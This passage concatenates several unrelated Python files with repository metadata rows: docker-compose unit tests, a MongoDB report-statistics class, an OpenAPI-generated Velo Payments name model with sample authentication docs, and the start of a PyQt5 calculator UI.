def test_connect_container_to_networks_short_aliase_exists(self):
service = Service(
'db',
self.mock_client,
'myproject',
image='foo',
networks={'project_default': {}})
container = Container(
None,
{
'Id': 'abcdef',
'NetworkSettings': {
'Networks': {
'project_default': {
'Aliases': ['analias', 'abcdef'],
},
},
},
},
True)
service.connect_container_to_networks(container)
assert not self.mock_client.disconnect_container_from_network.call_count
assert not self.mock_client.connect_container_to_network.call_count
def sort_by_name(dictionary_list):
return sorted(dictionary_list, key=lambda k: k['name'])
class BuildUlimitsTestCase(unittest.TestCase):
def test_build_ulimits_with_dict(self):
ulimits = build_ulimits(
{
'nofile': {'soft': 10000, 'hard': 20000},
'nproc': {'soft': 65535, 'hard': 65535}
}
)
expected = [
{'name': 'nofile', 'soft': 10000, 'hard': 20000},
{'name': 'nproc', 'soft': 65535, 'hard': 65535}
]
assert sort_by_name(ulimits) == sort_by_name(expected)
def test_build_ulimits_with_ints(self):
ulimits = build_ulimits({'nofile': 20000, 'nproc': 65535})
expected = [
{'name': 'nofile', 'soft': 20000, 'hard': 20000},
{'name': 'nproc', 'soft': 65535, 'hard': 65535}
]
assert sort_by_name(ulimits) == sort_by_name(expected)
def test_build_ulimits_with_integers_and_dicts(self):
ulimits = build_ulimits(
{
'nproc': 65535,
'nofile': {'soft': 10000, 'hard': 20000}
}
)
expected = [
{'name': 'nofile', 'soft': 10000, 'hard': 20000},
{'name': 'nproc', 'soft': 65535, 'hard': 65535}
]
assert sort_by_name(ulimits) == sort_by_name(expected)
class NetTestCase(unittest.TestCase):
def setUp(self):
self.mock_client = mock.create_autospec(docker.APIClient)
self.mock_client.api_version = DEFAULT_DOCKER_API_VERSION
self.mock_client._general_configs = {}
def test_network_mode(self):
network_mode = NetworkMode('host')
assert network_mode.id == 'host'
assert network_mode.mode == 'host'
assert network_mode.service_name is None
def test_network_mode_container(self):
container_id = 'abcd'
network_mode = ContainerNetworkMode(Container(None, {'Id': container_id}))
assert network_mode.id == container_id
assert network_mode.mode == 'container:' + container_id
assert network_mode.service_name is None
def test_network_mode_service(self):
container_id = 'bbbb'
service_name = 'web'
self.mock_client.containers.return_value = [
{'Id': container_id, 'Name': container_id, 'Image': 'abcd'},
]
service = Service(name=service_name, client=self.mock_client)
network_mode = ServiceNetworkMode(service)
assert network_mode.id == service_name
assert network_mode.mode == 'container:' + container_id
assert network_mode.service_name == service_name
def test_network_mode_service_no_containers(self):
service_name = 'web'
self.mock_client.containers.return_value = []
service = Service(name=service_name, client=self.mock_client)
network_mode = ServiceNetworkMode(service)
assert network_mode.id == service_name
assert network_mode.mode is None
assert network_mode.service_name == service_name
class ServicePortsTest(unittest.TestCase):
def test_formatted_ports(self):
ports = [
'3000',
'0.0.0.0:4025-4030:23000-23005',
ServicePort(6000, None, None, None, None),
ServicePort(8080, 8080, None, None, None),
ServicePort('20000', '20000', 'udp', 'ingress', None),
ServicePort(30000, '30000', 'tcp', None, '127.0.0.1'),
]
formatted = formatted_ports(ports)
assert ports[0] in formatted
assert ports[1] in formatted
assert '6000/tcp' in formatted
assert '8080:8080/tcp' in formatted
assert '20000:20000/udp' in formatted
assert '127.0.0.1:30000:30000/tcp' in formatted
def build_mount(destination, source, mode='rw'):
return {'Source': source, 'Destination': destination, 'Mode': mode}
class ServiceVolumesTest(unittest.TestCase):
def setUp(self):
self.mock_client = mock.create_autospec(docker.APIClient)
self.mock_client.api_version = DEFAULT_DOCKER_API_VERSION
self.mock_client._general_configs = {}
def test_build_volume_binding(self):
binding = build_volume_binding(VolumeSpec.parse('/outside:/inside', True))
assert binding == ('/inside', '/outside:/inside:rw')
def test_get_container_data_volumes(self):
options = [VolumeSpec.parse(v) for v in [
'/host/volume:/host/volume:ro',
'/new/volume',
'/existing/volume',
'named:/named/vol',
'/dev/tmpfs'
]]
self.mock_client.inspect_image.return_value = {
'ContainerConfig': {
'Volumes': {
'/mnt/image/data': {},
}
}
}
container = Container(self.mock_client, {
'Image': 'ababab',
'Mounts': [
{
'Source': '/host/volume',
'Destination': '/host/volume',
'Mode': '',
'RW': True,
'Name': 'hostvolume',
}, {
'Source': '/var/lib/docker/aaaaaaaa',
'Destination': '/existing/volume',
'Mode': '',
'RW': True,
'Name': 'existingvolume',
}, {
'Source': '/var/lib/docker/bbbbbbbb',
'Destination': '/removed/volume',
'Mode': '',
'RW': True,
'Name': 'removedvolume',
}, {
'Source': '/var/lib/docker/cccccccc',
'Destination': '/mnt/image/data',
'Mode': '',
'RW': True,
'Name': 'imagedata',
},
]
}, has_been_inspected=True)
expected = [
VolumeSpec.parse('existingvolume:/existing/volume:rw'),
VolumeSpec.parse('imagedata:/mnt/image/data:rw'),
]
volumes, _ = get_container_data_volumes(container, options, ['/dev/tmpfs'], [])
assert sorted(volumes) == sorted(expected)
def test_merge_volume_bindings(self):
options = [
VolumeSpec.parse(v, True) for v in [
'/host/volume:/host/volume:ro',
'/host/rw/volume:/host/rw/volume',
'/new/volume',
'/existing/volume',
'/dev/tmpfs'
]
]
self.mock_client.inspect_image.return_value = {
'ContainerConfig': {'Volumes': {}}
}
previous_container = Container(self.mock_client, {
'Id': 'cdefab',
'Image': 'ababab',
'Mounts': [{
'Source': '/var/lib/docker/aaaaaaaa',
'Destination': '/existing/volume',
'Mode': '',
'RW': True,
'Name': 'existingvolume',
}],
}, has_been_inspected=True)
expected = [
'/host/volume:/host/volume:ro',
'/host/rw/volume:/host/rw/volume:rw',
'existingvolume:/existing/volume:rw',
]
binds, affinity = merge_volume_bindings(options, ['/dev/tmpfs'], previous_container, [])
assert sorted(binds) == sorted(expected)
assert affinity == {'affinity:container': '=cdefab'}
def test_mount_same_host_path_to_two_volumes(self):
service = Service(
'web',
image='busybox',
volumes=[
VolumeSpec.parse('/host/path:/data1', True),
VolumeSpec.parse('/host/path:/data2', True),
],
client=self.mock_client,
)
self.mock_client.inspect_image.return_value = {
'Id': 'ababab',
'ContainerConfig': {
'Volumes': {}
}
}
service._get_container_create_options(
override_options={},
number=1,
)
assert set(self.mock_client.create_host_config.call_args[1]['binds']) == set([
'/host/path:/data1:rw',
'/host/path:/data2:rw',
])
def test_get_container_create_options_with_different_host_path_in_container_json(self):
service = Service(
'web',
image='busybox',
volumes=[VolumeSpec.parse('/host/path:/data')],
client=self.mock_client,
)
volume_name = 'abcdefff1234'
self.mock_client.inspect_image.return_value = {
'Id': 'ababab',
'ContainerConfig': {
'Volumes': {
'/data': {},
}
}
}
self.mock_client.inspect_container.return_value = {
'Id': '123123123',
'Image': 'ababab',
'Mounts': [
{
'Destination': '/data',
'Source': '/mnt/sda1/host/path',
'Mode': '',
'RW': True,
'Driver': 'local',
'Name': volume_name,
},
]
}
service._get_container_create_options(
override_options={},
number=1,
previous_container=Container(self.mock_client, {'Id': '123123123'}),
)
assert (
self.mock_client.create_host_config.call_args[1]['binds'] ==
['{}:/data:rw'.format(volume_name)]
)
def test_warn_on_masked_volume_no_warning_when_no_container_volumes(self):
volumes_option = [VolumeSpec('/home/user', '/path', 'rw')]
container_volumes = []
service = 'service_name'
with mock.patch('compose.service.log', autospec=True) as mock_log:
warn_on_masked_volume(volumes_option, container_volumes, service)
assert not mock_log.warn.called
def test_warn_on_masked_volume_when_masked(self):
volumes_option = [VolumeSpec('/home/user', '/path', 'rw')]
container_volumes = [
VolumeSpec('/var/lib/docker/path', '/path', 'rw'),
VolumeSpec('/var/lib/docker/path', '/other', 'rw'),
]
service = 'service_name'
with mock.patch('compose.service.log', autospec=True) as mock_log:
warn_on_masked_volume(volumes_option, container_volumes, service)
mock_log.warn.assert_called_once_with(mock.ANY)
def test_warn_on_masked_no_warning_with_same_path(self):
volumes_option = [VolumeSpec('/home/user', '/path', 'rw')]
container_volumes = [VolumeSpec('/home/user', '/path', 'rw')]
service = 'service_name'
with mock.patch('compose.service.log', autospec=True) as mock_log:
warn_on_masked_volume(volumes_option, container_volumes, service)
assert not mock_log.warn.called
def test_warn_on_masked_no_warning_with_container_only_option(self):
volumes_option = [VolumeSpec(None, '/path', 'rw')]
container_volumes = [
VolumeSpec('/var/lib/docker/volume/path', '/path', 'rw')
]
service = 'service_name'
with mock.patch('compose.service.log', autospec=True) as mock_log:
warn_on_masked_volume(volumes_option, container_volumes, service)
assert not mock_log.warn.called
def test_create_with_special_volume_mode(self):
self.mock_client.inspect_image.return_value = {'Id': 'imageid'}
self.mock_client.create_container.return_value = {'Id': 'containerid'}
volume = '/tmp:/foo:z'
Service(
'web',
client=self.mock_client,
image='busybox',
volumes=[VolumeSpec.parse(volume, True)],
).create_container()
assert self.mock_client.create_container.call_count == 1
assert self.mock_client.create_host_config.call_args[1]['binds'] == [volume]
class ServiceSecretTest(unittest.TestCase):
def setUp(self):
self.mock_client = mock.create_autospec(docker.APIClient)
self.mock_client.api_version = DEFAULT_DOCKER_API_VERSION
self.mock_client._general_configs = {}
def test_get_secret_volumes(self):
secret1 = {
'secret': ServiceSecret.parse({'source': 'secret1', 'target': 'b.txt'}),
'file': 'a.txt'
}
service = Service(
'web',
client=self.mock_client,
image='busybox',
secrets=[secret1]
)
volumes = service.get_secret_volumes()
assert volumes[0].source == secret1['file']
assert volumes[0].target == '{}/{}'.format(SECRETS_PATH, secret1['secret'].target)
def test_get_secret_volumes_abspath(self):
secret1 = {
'secret': ServiceSecret.parse({'source': 'secret1', 'target': '/d.txt'}),
'file': 'c.txt'
}
service = Service(
'web',
client=self.mock_client,
image='busybox',
secrets=[secret1]
)
volumes = service.get_secret_volumes()
assert volumes[0].source == secret1['file']
assert volumes[0].target == secret1['secret'].target
def test_get_secret_volumes_no_target(self):
secret1 = {
'secret': ServiceSecret.parse({'source': 'secret1'}),
'file': 'c.txt'
}
service = Service(
'web',
client=self.mock_client,
image='busybox',
secrets=[secret1]
)
volumes = service.get_secret_volumes()
assert volumes[0].source == secret1['file']
assert volumes[0].target == '{}/{}'.format(SECRETS_PATH, secret1['secret'].source)
| 37.531378 | 101 | 0.599226 | [
"Apache-2.0"
] | BEllis/compose | tests/unit/service_test.py | 55,021 | Python |
import subprocess
import pymongo
class ReportsDataBase:
def __init__(self, url, db_name):
self.db_name = db_name
self.db = pymongo.MongoClient(url)[self.db_name]
self.db['reports'].create_index('group')
self.db['reports'].create_index('author')
self.db['reports'].create_index('title')
self.db['reports'].create_index([
('group', pymongo.ASCENDING),
('author', pymongo.ASCENDING)
])
self.db['reports'].create_index([
('group', pymongo.ASCENDING),
('faculty', pymongo.ASCENDING),
('department', pymongo.ASCENDING)
])
def export_reports_collection(self, file_name):
result = subprocess.run(['mongoexport',
f'--host=mongodb',
'--pretty',
'--jsonArray',
f'--db={self.db_name}',
'--collection=reports',
f'--out={file_name}.json'])
if result.returncode == 0:
return f'{file_name}.json'
else:
raise ChildProcessError(f'mongoexport error return code [{result.returncode}]')
def import_reports_collection(self, file_name):
result = subprocess.run(['mongoimport',
f'--host=mongodb',
'--jsonArray',
'--mode=merge',
f'--db={self.db_name}',
'--collection=reports',
f'--file={file_name}.json'])
if result.returncode != 0:
raise ChildProcessError(f'mongoimport error return code [{result.returncode}]')
def _drop_reports(self):
self.db['reports'].drop()
def save_report(self, report):
insert_result = self.db['reports'].insert_one(report.serialize_db())
inserted_id = insert_result.inserted_id
return inserted_id
def save_reports(self, reports):
reports_to_insert = map(lambda report: report.serialize_db(), reports)
insert_result = self.db['reports'].insert_many(reports_to_insert)
insterted_ids = insert_result.insterted_ids
return insterted_ids
def update_report(self, report_id, update_dict):
self.db['reports'].update_one({'_id': report_id}, {'$set': update_dict})
def get_all_faculties(self):
return sorted(self.db['reports'].distinct('faculty'))
def get_all_courses(self):
return sorted(self.db['reports'].distinct('course'))
def get_all_departments(self):
return sorted(self.db['reports'].distinct('department'))
def get_report_by_id(self, report_id):
return self.db['reports'].find_one({'_id': report_id})
def get_report_stat_by_id(self, report_id):
return self.db['reports'].find_one({'_id': report_id},
{'text': 0, 'words.unique_words': 0})
def get_report_top_words_by_id(self, report_id, num_words):
report = self.db['reports'].find_one({'_id': report_id},
{'words.most_popular_words': 1})
if len(report['words']['most_popular_words']) < num_words:
return report['words']['most_popular_words']
else:
return report['words']['most_popular_words'][:num_words - 1]
def get_reports_by_author(self, author, group):
for report in self.db['reports'].find({'author': author, 'group': group}).sort('title'):
yield report
def get_reports_by_group(self, group):
for report in self.db['reports'].find({'group': group}).sort('author'):
yield report
def get_reports_by_faculty(self, faculty):
for report in self.db['reports'].find({'faculty': faculty}):
yield report
def get_reports_by_course(self, course):
for report in self.db['reports'].find({'course': course}):
yield report
def get_reports_by_department(self, department):
for report in self.db['reports'].find({'department': department}):
yield report
def get_stat_of_author(self, author):
cur = self.db['reports'].aggregate([
{'$match': {'author': author}},
{'$group': {
'_id': None,
'avg_total_words': {'$avg': '$words.total_words'},
'avg_unique_words': {'$avg': '$words.total_unique_words'},
'avg_persent_unique_words': {'$avg': '$words.persent_unique_words'},
'unique_words': {'$addToSet': '$words.unique_words'},
'avg_total_raw_symbols': {'$avg': '$symbols.total_raw_symbols'},
'avg_total_clean_symbols': {'$avg': '$symbols.total_clean_symbols'},
'total_reports_loaded': {'$sum': 1},
}
},
{'$addFields': {
'unique_words': {
'$reduce': {
'input': '$unique_words',
'initialValue': [],
'in': {'$setUnion': ['$$value', '$$this']}
}
}
}
},
{'$addFields': {'total_unique_words': {'$size': '$unique_words'}}}
])
return cur.next()
def get_stat_of_group(self, group):
return self.db['reports'].aggregate([
{'$match': {'group': group}},
{'$group': {
'_id': '$author',
'avg_total_words': {'$avg': '$words.total_words'},
'avg_unique_words': {'$avg': '$words.total_unique_words'},
'avg_persent_unique_words': {'$avg': '$words.persent_unique_words'},
'unique_words': {'$addToSet': '$words.unique_words'},
'avg_total_raw_symbols': {'$avg': '$symbols.total_raw_symbols'},
'avg_total_clean_symbols': {'$avg': '$symbols.total_clean_symbols'},
'total_reports_loaded': {'$sum': 1}
}
},
{'$addFields': {
'unique_words': {
'$reduce': {
'input': '$unique_words',
'initialValue': [],
'in': {'$setUnion': ['$$value', '$$this']}
}
}
}
},
{'$addFields': {'total_unique_words': {'$size': '$unique_words'}}},
{'$sort': {'_id': 1, 'total_unique_words': -1}}
])
def get_stat_by_groups(self, course=None, faculty=None, department=None):
group = {
'$group': {
'_id': '$group',
'avg_total_words': {'$avg': '$words.total_words'},
'avg_unique_words': {'$avg': '$words.total_unique_words'},
'avg_persent_unique_words': {'$avg': '$words.persent_unique_words'},
'total_reports_loaded': {'$sum': 1}
}}
sort = {'$sort': {'_id': 1}}
if not course and not faculty and not department:
return self.db['reports'].aggregate([
group,
sort
])
if course and not faculty and not department:
match = {'$match': {'course': course}}
elif faculty and not course and not department:
match = {'$match': {'faculty': faculty}}
sort['$sort']['faculty'] = 1
elif department and not course and not faculty:
match = {'$match': {'department': department}}
sort['$sort']['department'] = 1
elif course and faculty or course and department or faculty and department:
match_list = []
if course:
match_list.append({'course': course})
if faculty:
match_list.append({'faculty': faculty})
sort['$sort']['faculty'] = 1
if department:
match_list.append({'department': department})
sort['$sort']['department'] = 1
match = {'$match': {'$and': match_list}}
return self.db['reports'].aggregate([
match,
group,
sort
])
def get_words_compare(self, authors, group):
match_list = []
for author in authors:
match_list.append({'author': author})
match = {
'$match': {
'$and': [
{'group': group},
{'$or': match_list}
]
}
}
query = self.db['reports'].aggregate([
match,
{'$group': {
'_id': '$author',
'unique_words': {'$addToSet': '$words.unique_words'}
}},
{'$addFields': {
'unique_words': {
'$reduce': {
'input': '$unique_words',
'initialValue': [],
'in': {'$setUnion': ['$$value', '$$this']}
}
}
}
},
{'$sort': {'_id': 1}}
])
authors = list(query)
compare = {}
words_intersections = []
for author in authors:
compare[author['_id']] = dict()
for other_author in authors:
if other_author['_id'] == author['_id']:
compare[author['_id']][author['_id']] = float('nan')
else:
author_unique_words = set(author['unique_words'])
other_author_unique_words = set(other_author['unique_words'])
author_num_unique_words = len(author_unique_words)
other_author_num_unique_words = len(other_author_unique_words)
words_intersection = author_unique_words.intersection(other_author_unique_words)
compare[author['_id']][other_author['_id']] = len(words_intersection) \
/ min(author_num_unique_words, other_author_num_unique_words) * 100.0
words_intersections.append((
author['_id'],
other_author['_id'],
words_intersection
))
# words_intersections = [ (author_name, other_author_name, ['word1', 'word2', 'word3', ...]), .... ]
return compare, words_intersections | 36.567857 | 108 | 0.514601 | [
"MIT"
] | moevm/nosql1h19-report-stats | src/database/reports_data_base.py | 10,239 | Python |
# coding: utf-8
"""
Velo Payments APIs
## Terms and Definitions Throughout this document and the Velo platform the following terms are used: * **Payor.** An entity (typically a corporation) which wishes to pay funds to one or more payees via a payout. * **Payee.** The recipient of funds paid out by a payor. * **Payment.** A single transfer of funds from a payor to a payee. * **Payout.** A batch of Payments, typically used by a payor to logically group payments (e.g. by business day). Technically there need be no relationship between the payments in a payout - a single payout can contain payments to multiple payees and/or multiple payments to a single payee. * **Sandbox.** An integration environment provided by Velo Payments which offers a similar API experience to the production environment, but all funding and payment events are simulated, along with many other services such as OFAC sanctions list checking. ## Overview The Velo Payments API allows a payor to perform a number of operations. The following is a list of the main capabilities in a natural order of execution: * Authenticate with the Velo platform * Maintain a collection of payees * Query the payor’s current balance of funds within the platform and perform additional funding * Issue payments to payees * Query the platform for a history of those payments This document describes the main concepts and APIs required to get up and running with the Velo Payments platform. It is not an exhaustive API reference. For that, please see the separate Velo Payments API Reference. ## API Considerations The Velo Payments API is REST based and uses the JSON format for requests and responses. Most calls are secured using OAuth 2 security and require a valid authentication access token for successful operation. See the Authentication section for details. Where a dynamic value is required in the examples below, the {token} format is used, suggesting that the caller needs to supply the appropriate value of the token in question (without including the { or } characters). Where curl examples are given, the –d @filename.json approach is used, indicating that the request body should be placed into a file named filename.json in the current directory. Each of the curl examples in this document should be considered a single line on the command-line, regardless of how they appear in print. ## Authenticating with the Velo Platform Once Velo backoffice staff have added your organization as a payor within the Velo platform sandbox, they will create you a payor Id, an API key and an API secret and share these with you in a secure manner. You will need to use these values to authenticate with the Velo platform in order to gain access to the APIs. The steps to take are explained in the following: create a string comprising the API key (e.g. 44a9537d-d55d-4b47-8082-14061c2bcdd8) and API secret (e.g. c396b26b-137a-44fd-87f5-34631f8fd529) with a colon between them. E.g. 44a9537d-d55d-4b47-8082-14061c2bcdd8:c396b26b-137a-44fd-87f5-34631f8fd529 base64 encode this string. E.g.: NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ== create an HTTP **Authorization** header with the value set to e.g. Basic NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ== perform the Velo authentication REST call using the HTTP header created above e.g. via curl: ``` curl -X POST \\ -H \"Content-Type: application/json\" \\ -H \"Authorization: Basic NDRhOTUzN2QtZDU1ZC00YjQ3LTgwODItMTQwNjFjMmJjZGQ4OmMzOTZiMjZiLTEzN2EtNDRmZC04N2Y1LTM0NjMxZjhmZDUyOQ==\" \\ 'https://api.sandbox.velopayments.com/v1/authenticate?grant_type=client_credentials' ``` If successful, this call will result in a **200** HTTP status code and a response body such as: ``` { \"access_token\":\"19f6bafd-93fd-4747-b229-00507bbc991f\", \"token_type\":\"bearer\", \"expires_in\":1799, \"scope\":\"...\" } ``` ## API access following authentication Following successful authentication, the value of the access_token field in the response (indicated in green above) should then be presented with all subsequent API calls to allow the Velo platform to validate that the caller is authenticated. This is achieved by setting the HTTP Authorization header with the value set to e.g. Bearer 19f6bafd-93fd-4747-b229-00507bbc991f such as the curl example below: ``` -H \"Authorization: Bearer 19f6bafd-93fd-4747-b229-00507bbc991f \" ``` If you make other Velo API calls which require authorization but the Authorization header is missing or invalid then you will get a **401** HTTP status response. # noqa: E501
The version of the OpenAPI document: 2.26.124
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class Name2(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'title': 'str',
'first_name': 'str',
'other_names': 'str',
'last_name': 'str'
}
attribute_map = {
'title': 'title',
'first_name': 'firstName',
'other_names': 'otherNames',
'last_name': 'lastName'
}
def __init__(self, title=None, first_name=None, other_names=None, last_name=None): # noqa: E501
"""Name2 - a model defined in OpenAPI""" # noqa: E501
self._title = None
self._first_name = None
self._other_names = None
self._last_name = None
self.discriminator = None
if title is not None:
self.title = title
if first_name is not None:
self.first_name = first_name
if other_names is not None:
self.other_names = other_names
if last_name is not None:
self.last_name = last_name
@property
def title(self):
"""Gets the title of this Name2. # noqa: E501
:return: The title of this Name2. # noqa: E501
:rtype: str
"""
return self._title
@title.setter
def title(self, title):
"""Sets the title of this Name2.
:param title: The title of this Name2. # noqa: E501
:type: str
"""
if title is not None and len(title) > 10:
raise ValueError("Invalid value for `title`, length must be less than or equal to `10`") # noqa: E501
if title is not None and len(title) < 1:
raise ValueError("Invalid value for `title`, length must be greater than or equal to `1`") # noqa: E501
self._title = title
@property
def first_name(self):
"""Gets the first_name of this Name2. # noqa: E501
:return: The first_name of this Name2. # noqa: E501
:rtype: str
"""
return self._first_name
@first_name.setter
def first_name(self, first_name):
"""Sets the first_name of this Name2.
:param first_name: The first_name of this Name2. # noqa: E501
:type: str
"""
if first_name is not None and len(first_name) > 40:
raise ValueError("Invalid value for `first_name`, length must be less than or equal to `40`") # noqa: E501
if first_name is not None and len(first_name) < 1:
raise ValueError("Invalid value for `first_name`, length must be greater than or equal to `1`") # noqa: E501
self._first_name = first_name
@property
def other_names(self):
"""Gets the other_names of this Name2. # noqa: E501
:return: The other_names of this Name2. # noqa: E501
:rtype: str
"""
return self._other_names
@other_names.setter
def other_names(self, other_names):
"""Sets the other_names of this Name2.
:param other_names: The other_names of this Name2. # noqa: E501
:type: str
"""
if other_names is not None and len(other_names) > 40:
raise ValueError("Invalid value for `other_names`, length must be less than or equal to `40`") # noqa: E501
if other_names is not None and len(other_names) < 1:
raise ValueError("Invalid value for `other_names`, length must be greater than or equal to `1`") # noqa: E501
self._other_names = other_names
@property
def last_name(self):
"""Gets the last_name of this Name2. # noqa: E501
:return: The last_name of this Name2. # noqa: E501
:rtype: str
"""
return self._last_name
@last_name.setter
def last_name(self, last_name):
"""Sets the last_name of this Name2.
:param last_name: The last_name of this Name2. # noqa: E501
:type: str
"""
if last_name is not None and len(last_name) > 40:
raise ValueError("Invalid value for `last_name`, length must be less than or equal to `40`") # noqa: E501
if last_name is not None and len(last_name) < 1:
raise ValueError("Invalid value for `last_name`, length must be greater than or equal to `1`") # noqa: E501
self._last_name = last_name
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Name2):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 52.376812 | 4,651 | 0.666021 | [
"Apache-2.0"
] | velopaymentsapi/velo-python | velo_payments/models/name2.py | 10,846 | Python |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'calculator2.ui'
#
# Created by: PyQt5 UI code generator 5.15.3
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setEnabled(True)
MainWindow.setFixedSize(QtCore.QSize(471, 400))
MainWindow.setTabletTracking(False)
MainWindow.setDockNestingEnabled(False)
MainWindow.setUnifiedTitleAndToolBarOnMac(False)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setMinimumSize(QtCore.QSize(471, 390))
self.centralwidget.setMaximumSize(QtCore.QSize(471, 390))
self.centralwidget.setObjectName("centralwidget")
self.lcdNumber = QtWidgets.QLCDNumber(self.centralwidget)
self.lcdNumber.setGeometry(QtCore.QRect(10, 40, 451, 101))
self.lcdNumber.setStyleSheet("background-color: rgb(255, 255, 255);")
self.lcdNumber.setFrameShape(QtWidgets.QFrame.Box)
self.lcdNumber.setSmallDecimalPoint(False)
self.lcdNumber.setDigitCount(14)
self.lcdNumber.setSegmentStyle(QtWidgets.QLCDNumber.Flat)
self.lcdNumber.setObjectName("lcdNumber")
self.num_1 = QtWidgets.QPushButton(self.centralwidget)
self.num_1.setGeometry(QtCore.QRect(10, 290, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_1.setFont(font)
self.num_1.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_1.setObjectName("num_1")
self.buttonGroup = QtWidgets.QButtonGroup(MainWindow)
self.buttonGroup.setObjectName("buttonGroup")
self.buttonGroup.addButton(self.num_1)
self.num_2 = QtWidgets.QPushButton(self.centralwidget)
self.num_2.setGeometry(QtCore.QRect(100, 290, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_2.setFont(font)
self.num_2.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_2.setObjectName("num_2")
self.buttonGroup.addButton(self.num_2)
self.num_3 = QtWidgets.QPushButton(self.centralwidget)
self.num_3.setGeometry(QtCore.QRect(190, 290, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_3.setFont(font)
self.num_3.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_3.setObjectName("num_3")
self.buttonGroup.addButton(self.num_3)
self.num_plus = QtWidgets.QPushButton(self.centralwidget)
self.num_plus.setGeometry(QtCore.QRect(280, 190, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_plus.setFont(font)
self.num_plus.setStyleSheet(
"background-color: rgb(255, 85, 0);\n"
"color: rgb(255, 255, 255);")
self.num_plus.setObjectName("num_plus")
self.num_4 = QtWidgets.QPushButton(self.centralwidget)
self.num_4.setGeometry(QtCore.QRect(10, 240, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_4.setFont(font)
self.num_4.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_4.setObjectName("num_4")
self.buttonGroup.addButton(self.num_4)
self.num_5 = QtWidgets.QPushButton(self.centralwidget)
self.num_5.setGeometry(QtCore.QRect(100, 240, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_5.setFont(font)
self.num_5.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_5.setObjectName("num_5")
self.buttonGroup.addButton(self.num_5)
self.num_6 = QtWidgets.QPushButton(self.centralwidget)
self.num_6.setGeometry(QtCore.QRect(190, 240, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_6.setFont(font)
self.num_6.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_6.setObjectName("num_6")
self.buttonGroup.addButton(self.num_6)
self.num_minus = QtWidgets.QPushButton(self.centralwidget)
self.num_minus.setGeometry(QtCore.QRect(280, 240, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_minus.setFont(font)
self.num_minus.setStyleSheet(
"background-color: rgb(255, 85, 0);\n"
"color: rgb(255, 255, 255);")
self.num_minus.setObjectName("num_minus")
self.num_7 = QtWidgets.QPushButton(self.centralwidget)
self.num_7.setGeometry(QtCore.QRect(10, 190, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_7.setFont(font)
self.num_7.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_7.setObjectName("num_7")
self.buttonGroup.addButton(self.num_7)
self.num_8 = QtWidgets.QPushButton(self.centralwidget)
self.num_8.setGeometry(QtCore.QRect(100, 190, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_8.setFont(font)
self.num_8.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_8.setObjectName("num_8")
self.buttonGroup.addButton(self.num_8)
self.num_9 = QtWidgets.QPushButton(self.centralwidget)
self.num_9.setGeometry(QtCore.QRect(190, 190, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_9.setFont(font)
self.num_9.setStyleSheet(
"background-color: rgb(71, 64, 64);\n"
"color: rgb(255, 255, 255);")
self.num_9.setObjectName("num_9")
self.buttonGroup.addButton(self.num_9)
self.num_mult = QtWidgets.QPushButton(self.centralwidget)
self.num_mult.setGeometry(QtCore.QRect(280, 290, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_mult.setFont(font)
self.num_mult.setStyleSheet(
"background-color: rgb(255, 85, 0);\n"
"color: rgb(255, 255, 255);")
self.num_mult.setObjectName("num_mult")
self.num_point = QtWidgets.QPushButton(self.centralwidget)
self.num_point.setGeometry(QtCore.QRect(10, 340, 91, 51))
font = QtGui.QFont()
font.setPointSize(20)
self.num_point.setFont(font)
